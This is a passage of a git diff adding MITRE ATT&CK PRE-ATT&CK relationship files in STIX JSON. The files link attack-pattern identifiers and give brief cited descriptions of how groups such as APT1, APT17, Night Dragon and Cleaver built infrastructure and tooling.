"bundle--69956b60-b3d0-41eb-bb99-53e4a1d448ca", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "relationship_type": "related-to", + "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0.json new file mode 100644 index 0000000000000000000000000000000000000000..4d6458f1944ed665aafdb0306a8a978b7425c6fa --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--332c63e5-7dba-4e07-adb2-6b3ccbb9e702", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe", + "relationship_type": "related-to", + "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9524754d-7743-47b3-8395-3cbfb633c020.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9524754d-7743-47b3-8395-3cbfb633c020.json new file mode 100644 index 0000000000000000000000000000000000000000..35c099d799224e88738ed2cb6b3d48c2cfe50462 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9524754d-7743-47b3-8395-3cbfb633c020.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--fb3e1df6-70cf-47fb-a4d0-51f6d79d72f0", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--9524754d-7743-47b3-8395-3cbfb633c020", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549", + "relationship_type": "related-to", + "target_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5.json new file mode 100644 index 0000000000000000000000000000000000000000..59a21d97d8ba09db490021118ca62dfe8d190941 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--480f7314-05d7-4f2b-9612-26ba406a0cff", + "spec_version": "2.0", + "objects": [ + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "external_references": [ + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) compromised a vast set of 3rd party victim hop points as part of their network infrastructure. For example, [APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be \u201chijacked\u201d since they were originally registered for a legitimate reason but were used by APT1 for malicious purposes.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5", + "type": "relationship", + "modified": "2020-03-25T13:59:27.774Z", + "created": "2020-03-25T13:59:27.774Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81.json new file mode 100644 index 0000000000000000000000000000000000000000..5ec0c694761c7d8195ac6022288428625fcdd3d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--af697ecf-e489-4c83-a09b-6e9c2cb7599e", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "relationship_type": "related-to", + "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9.json new file mode 100644 index 0000000000000000000000000000000000000000..6e0acbfb82583765bc581cc5598cb345af95901f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bc751189-cd29-4dbc-bfac-2be2f89d6623", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6", + "relationship_type": "related-to", + "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd.json new file mode 100644 index 0000000000000000000000000000000000000000..cdabc9e9c41dd1dbc86142c3cb0b4cfb74443ebc --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e5fc3016-c917-42c4-98c8-bc7d046e5b46", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c44b2ec-70b0-4f5c-800e-426477330658.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c44b2ec-70b0-4f5c-800e-426477330658.json new file mode 100644 index 0000000000000000000000000000000000000000..8408427a296f73782d2dd8d9d5a39bad4202ff68 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c44b2ec-70b0-4f5c-800e-426477330658.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3d153a84-c919-4ebd-8a14-e79700c2a3f2", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--9c44b2ec-70b0-4f5c-800e-426477330658", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c87b627-de61-42da-a658-7bdb33358754.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c87b627-de61-42da-a658-7bdb33358754.json new file mode 100644 index 0000000000000000000000000000000000000000..b5b456bea3ff52e472ab5dcc624502494d871066 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c87b627-de61-42da-a658-7bdb33358754.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--605718c9-966a-4258-b84a-0403a64ee2e1", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--9c87b627-de61-42da-a658-7bdb33358754", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[APT17](https://attack.mitre.org/groups/G0025) obfuscated infrastructure using a multi-layered malware beaconing approach. (Citation: FireEye APT17)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "relationship_type": "uses", + "target_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39", + "type": "relationship", + "modified": "2019-03-22T14:21:19.564Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061.json new file mode 100644 index 0000000000000000000000000000000000000000..c517d262b887f62d0191693aec90c6fe8e112de4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9c3a6c9c-9134-40a1-aabd-b525cfdb9a93", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff", + "relationship_type": "related-to", + "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0.json new file mode 100644 index 0000000000000000000000000000000000000000..04e15f2d8286505e3624aca891c1d7afc8a85ca2 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--e3e32a74-befa-4b53-a8e1-83ae097a85de", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used privately developed and customized remote access tools.(Citation: McAfee Night Dragon)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + } + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "relationship_type": "uses", + "target_ref": "attack-pattern--9755ecdc-deb0-40e6-af49-713cb0f8ed92", + "type": "relationship", + "modified": "2019-03-25T14:36:29.918Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53.json new file mode 100644 index 0000000000000000000000000000000000000000..5c164e5557b6ff5f9095e710c6da4e3f6a7ffa45 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b0d3b348-c579-4a03-9e2a-0dcf75c88c3c", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05", + "relationship_type": "related-to", + "target_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab313887-ff00-4aa9-8edb-ab107c517c19.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab313887-ff00-4aa9-8edb-ab107c517c19.json new file mode 100644 index 0000000000000000000000000000000000000000..6e314cdf9894c4dae5ea16ec80d10fe907faa7c5 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab313887-ff00-4aa9-8edb-ab107c517c19.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dfde58c5-f99e-4356-bec3-48cd0d8b1950", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--ab313887-ff00-4aa9-8edb-ab107c517c19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd.json new file mode 100644 index 0000000000000000000000000000000000000000..83c145267ab7167858dfa1fc7d76d9ac06f64815 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--02ac2fba-23d9-483d-886d-874f5bfc8403", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) created fake LinkedIn profiles.(Citation: Dell Threat Group 2889)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "type": "relationship", + "modified": "2019-03-22T20:00:23.846Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80.json new file mode 100644 index 0000000000000000000000000000000000000000..f4188fc086efd804d53a0b9638b03bc172a6f9c0 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0c1a8c65-3721-473c-8449-2f2341f39883", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34.json new file mode 100644 index 0000000000000000000000000000000000000000..02ac9aa32cd56bf7a40bfeb1dfd02cb946164360 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b0658dc9-8814-41ed-a8da-b599fa53a5be", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae", + "relationship_type": "related-to", + "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb.json new file mode 100644 index 0000000000000000000000000000000000000000..d4bef6a4253096a375977eb57135c1eb0a84662f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb.json @@ -0,0 +1,28 @@ +{ + "type": "bundle", + "id": "bundle--694a4c48-e875-49dc-99e6-81793b10ebb9", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.(Citation: Cylance Cleaver)", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "relationship_type": "uses", + "target_ref": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234", + "type": "relationship", + "modified": "2019-03-22T20:00:23.891Z", + "created": "2017-12-14T16:46:06.044Z" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b180dee5-0d48-448f-94b9-4997f0c584d5.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b180dee5-0d48-448f-94b9-4997f0c584d5.json new file mode 100644 index 0000000000000000000000000000000000000000..9a9496a97ff0e1bb750ee3b0224166b84b13847f --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b180dee5-0d48-448f-94b9-4997f0c584d5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8c855a00-13d9-4255-8968-acf5196de4dd", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--b180dee5-0d48-448f-94b9-4997f0c584d5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d.json new file mode 100644 index 0000000000000000000000000000000000000000..506c99ba34bb68aff9964c793b398bea9609daca --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--edfe4faf-a02e-40b0-acb6-f50fb88bae0e", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--bbb1c074-a93a-4e40-b11e-2151403f7f1d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1", + "relationship_type": "related-to", + "target_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4.json new file mode 100644 index 0000000000000000000000000000000000000000..9f9d64db580a0004baf1835a78e778fea354529d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--23de2fe2-a6cd-4514-83be-7418a5269858", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--bc165934-7ef6-4aed-a0d7-81d3372589f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--e51398e6-53dc-4e9f-a323-e54683d8672b", + "relationship_type": "related-to", + "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--be031f72-737b-4afd-b2c1-c565f5ab7369.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--be031f72-737b-4afd-b2c1-c565f5ab7369.json new file mode 100644 index 0000000000000000000000000000000000000000..53113f1e0f4bd8a2ef92ad5a15e991bdf5f4df0d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--be031f72-737b-4afd-b2c1-c565f5ab7369.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--883f441a-445a-49d6-a85b-5a69349f0001", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--be031f72-737b-4afd-b2c1-c565f5ab7369", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "relationship_type": "related-to", + "target_ref": "attack-pattern--784ff1bc-1483-41fe-a172-4cd9ae25c06b" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812.json new file mode 100644 index 0000000000000000000000000000000000000000..5cda4130a5711d278aa850f5e196920ed2a9dd13 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b8b3f6e6-b4d6-4360-ab32-aaa2197575be", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--c124f0ba-f4bc-430a-b40c-eebe0577f812", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73", + "relationship_type": "related-to", + "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--c6e43693-2a6d-4ba8-8fa7-ec1ab5239528.json new file mode 100644 index 0000000000000000000000000000000000000000..288b39eced613a1e2c08f798bc959e6c46b5c30b --- /dev/null +++ 